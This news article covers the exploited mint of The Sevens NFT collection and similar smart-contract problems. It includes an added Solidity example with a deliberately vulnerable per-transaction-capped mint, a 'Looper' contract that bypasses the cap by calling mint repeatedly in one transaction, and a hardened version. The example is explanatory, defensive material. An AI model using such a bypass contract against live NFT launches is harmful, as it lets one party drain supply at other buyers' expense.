Lucky number Sevens – Do smart contracts for NFT collectibles need to get smarter?

23rd September 2021

The highly anticipated project The Sevens is the latest NFT collectible to fall victim to an exploit of its smart contract: during the project's launch on Tuesday, 7 September, a member of its own community, @1ethSHOP, was able to mint 1008 of the 7000 collectibles.

@skidrowcrypto covered a similar exploit of the Chiptopunks smart contract on 23 August, showing that vulnerabilities in Solidity contracts are an ongoing problem for the NFT collectibles ecosystem.

One of the developers of Chiptopunks, gaper.eth, stated that “This is frowned upon by the community, but most people are anonymous, making it impossible for us to reach out to the guy that minted 150 of the 512 Chiptos. So, on the developers’ side, there isn’t really much to do other than prepare for the next time to make sure that this doesn’t happen again.”  

The Sevens were truly lucky that the culprit, a fanatical supporter of the project who got “carried away with minting,” contacted the developers through their Discord to help deal with the aftermath. After lengthy negotiations, the development team was able to recover 500 of the NFTs.

However, not every development team will be so fortunate. Gaper.eth commented that “if one account holds a large portion of the collection, it may make the project less desirable.” Unfortunately, this kind of incident is common enough in NFT culture that it feeds FUD and raises suspicions of malpractice, insider activity and market manipulation.

So, what happened? The Sevens team explained in their published statement on the roll-out strategy:

“Quite simply, we allowed minting via contract to allow an array of interested parties to engage with our project. Research was conducted into other popular project launches, and we found that this was the most inclusive setup. This was common practice. Looking back, should we have blocked contract-level interaction? Yes. So we sincerely apologize for this.”

Without some kind of standard, peer review or external audit, anyone well-versed in Solidity, the main language for Ethereum contracts, can find and exploit holes in publicly available and (often) copy-and-pasted smart contracts. @OxBender offered a technical deep-dive into how The Sevens transaction limiter was circumvented.
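To make the class of bug concrete, here is an added illustration (not The Sevens contract, and not @OxBender's analysis) of the pattern the team describes: a mint function that only limits how many tokens a single call can buy, and a throwaway contract that calls it in a loop so the limit never trips. The contract names, the cap of 7 per transaction and the price are assumed for the example; token bookkeeping is reduced to a mapping so the code stands alone. The hardened version underneath shows the two checks most projects adopted after incidents like this: refusing calls that do not come straight from an externally owned account, and capping mints per address instead of per transaction.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from The Sevens. A real mint would sit on an
// ERC721; here ownership is a plain mapping so the example is self-contained.

// 1. Vulnerable: the cap is enforced per call, and nothing stops a contract
//    from making many calls inside one transaction.
contract PerTxCapMint {
    uint256 public constant MAX_SUPPLY = 7000;
    uint256 public constant MAX_PER_TX = 7;        // assumed cap
    uint256 public constant PRICE = 0.07 ether;    // assumed price
    uint256 public totalSupply;
    mapping(uint256 => address) public ownerOf;

    function mint(uint256 n) external payable {
        require(n > 0 && n <= MAX_PER_TX, "max 7 per tx");
        require(totalSupply + n <= MAX_SUPPLY, "sold out");
        require(msg.value == n * PRICE, "wrong payment");
        for (uint256 i = 0; i < n; i++) {
            // msg.sender may be a contract; with a plain _mint (no
            // onERC721Received check) the tokens land there all the same.
            ownerOf[totalSupply++] = msg.sender;
        }
    }
}

// Bypass: deploying this contract from an EOA with enough ETH mints
// MAX_PER_TX * calls tokens in a single transaction. Every call to mint()
// sees n == 7, so the per-call cap passes each time. The tokens are owned by
// the Looper contract, which its deployer controls.
contract Looper {
    constructor(PerTxCapMint target, uint256 calls) payable {
        uint256 perCall = target.MAX_PER_TX();
        uint256 cost = perCall * target.PRICE();
        for (uint256 i = 0; i < calls; i++) {
            target.mint{value: cost}(perCall);
        }
    }
}

// 2. Hardened: same mint, plus (a) refuse any caller that is not the
//    transaction originator, so Looper's calls revert, and (b) count mints per
//    address across transactions rather than per call.
contract PerWalletCapMint {
    uint256 public constant MAX_SUPPLY = 7000;
    uint256 public constant MAX_PER_WALLET = 7;    // assumed cap
    uint256 public constant PRICE = 0.07 ether;    // assumed price
    uint256 public totalSupply;
    mapping(uint256 => address) public ownerOf;
    mapping(address => uint256) public minted;

    function mint(uint256 n) external payable {
        require(msg.sender == tx.origin, "contracts may not mint");
        require(n > 0 && minted[msg.sender] + n <= MAX_PER_WALLET, "max 7 per wallet");
        require(totalSupply + n <= MAX_SUPPLY, "sold out");
        require(msg.value == n * PRICE, "wrong payment");
        minted[msg.sender] += n;
        for (uint256 i = 0; i < n; i++) {
            ownerOf[totalSupply++] = msg.sender;
        }
    }
}
```

Neither check is a complete fix. `msg.sender == tx.origin` also locks out users who mint from smart-contract wallets, and a per-address cap is only as strong as the cost of creating more addresses, since one person can fund many. What the two checks do buy is that a single transaction can no longer take a four-digit share of the supply, which is the failure that happened here.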

“What happens in practice is that people see that one contract works, so they will go and use that contract and try to do what that contract did,” gaper.eth commented. “Once that contract comes out to solve this issue, most people will probably copy it and after that, it will become standard practice.”

@Mikeejt, the developer of the upcoming Eternal Royals NFT, stated that OpenZeppelin has emerged as the standard for smart contracts and other blockchain applications. “There’s no need for an external audit of a smart contract, which is usually very expensive. OpenZeppelin provides libraries and code for developers for best practices in relation to smart contracts and also provides this audit function should you need it.”

Despite their controversial launch, The Sevens team have made efforts to be transparent and fair throughout the development, launch, and post-launch, showing a commitment to their goals for the project.

As promised by the project’s innovative roadmap, the culturally relevant iconography found within The Sevens NFTs will set the principal themes for questions that the community will need to answer in an event known as the “Treasure Hunt.” The properties and remarkable artwork of these 7000 unique collectibles include references to pop culture, memes, games, movies, anime, and more, promising to make for treasure hunting of OASIS-sized proportions. With a backstory set in a dystopian future and taglines such as “Our salvation is the metaverse” and “The Sevens are keys” on their official website, it’s hard to believe that the developers were not inspired by Ernest Cline’s Ready Player One, which also features a hunt for “Halliday’s Easter Egg.” Not unlike James Halliday, the developers of The Sevens sought to share their passion for 21st-century culture, receiving (almost) overwhelming support from the NFT community, as evidenced by The Sevens Discord server being 70 000+ members strong at the time of writing this article.

With such a strong foundation for the launch of an NFT collectible, it’s understandable that FOMO levels were well over 9000. The fear of missing out on owning one of the 7000 collectibles was further exacerbated by a pre-sale event organized by the developers that was harder to get into than an otaku’s bento box.

“Gas wars” is the term for a period when demand for block space outstrips supply, typically because thousands of wallets are trying to transact at once during a popular mint, and bidders keep raising the gas price they offer so that their transactions are included first. (Pictured: It’s Always Sunny in Philadelphia opening, Season 4, Episode 2).

Developers in the NFT collectibles space have been deliberating how to achieve a fair collection distribution while mitigating the exorbitant gas fees that inevitably arise on the Ethereum blockchain during a popular mint. A pre-sale “whitelist” has been one of the ways projects have tried to sidestep gas wars. However, adding to and updating an on-chain whitelist is costly and/or time-consuming (storing only a Merkle root of the list on-chain and having buyers submit a proof keeps that cost flat, at the price of more work on the client side). Furthermore, a whitelist does not guarantee that someone will actually buy the NFT at launch, nor does it by itself stop someone from bypassing a per-transaction limiter to mint 1008. This kind of behaviour makes “stealth drops” so much more attractive to projects, at the cost of being less inclusive.

@Mikeejt plans for the Eternal Royals NFT to “have a large list of whitelisted addresses, but there’s no guarantee that they will buy an NFT at launch. This is why participation on Discord as well as other social media engagement such as Twitter and Clubhouse are important to show interest in our project.”

The Sevens is a testament to the mint-mania that surrounds the launch of super-popular NFT collectibles; it also serves as a cautionary tale for developers to learn from the mistakes of others. While the decentralized nature of the NFT collectible space doesn’t exactly allow for representations and warranties, publishing the contract’s address on the project’s website creates credibility, because anyone can read the verified source and check the mint logic for themselves. The Sevens team stated that “As the blockchain motto goes: ‘don’t trust, verify,’ we’re not just promising not to cheat, we’re proving that we cannot cheat, even if we wanted to.”

https://opensea.io/assets/0xf497253c2bb7644ebb99e4d9ecc104ae7a79187a/5995

If developers want to add another layer of security and grow the trust of the NFT community, it would be prudent to do their due diligence so they can assure their communities that the loopholes in their smart contracts have been plugged. “It’s really difficult to find a one-size-fits-all solution to this problem,” gaper.eth commented. “We need to group-think this through to find the best solution.”

For more on The Sevens:

Official Sevens site:

https://thesevensofficial.com/

The Sevens medium publications:

https://medium.com/@TheSevensOfficial?p=d6e390ac681c

The Sevens official OpenSea collection:

https://opensea.io/collection/the-sevens-official?collectionSlug=the-sevens-official 

Link to the sevens official Discord:
https://discord.com/invite/777-thesevens-777
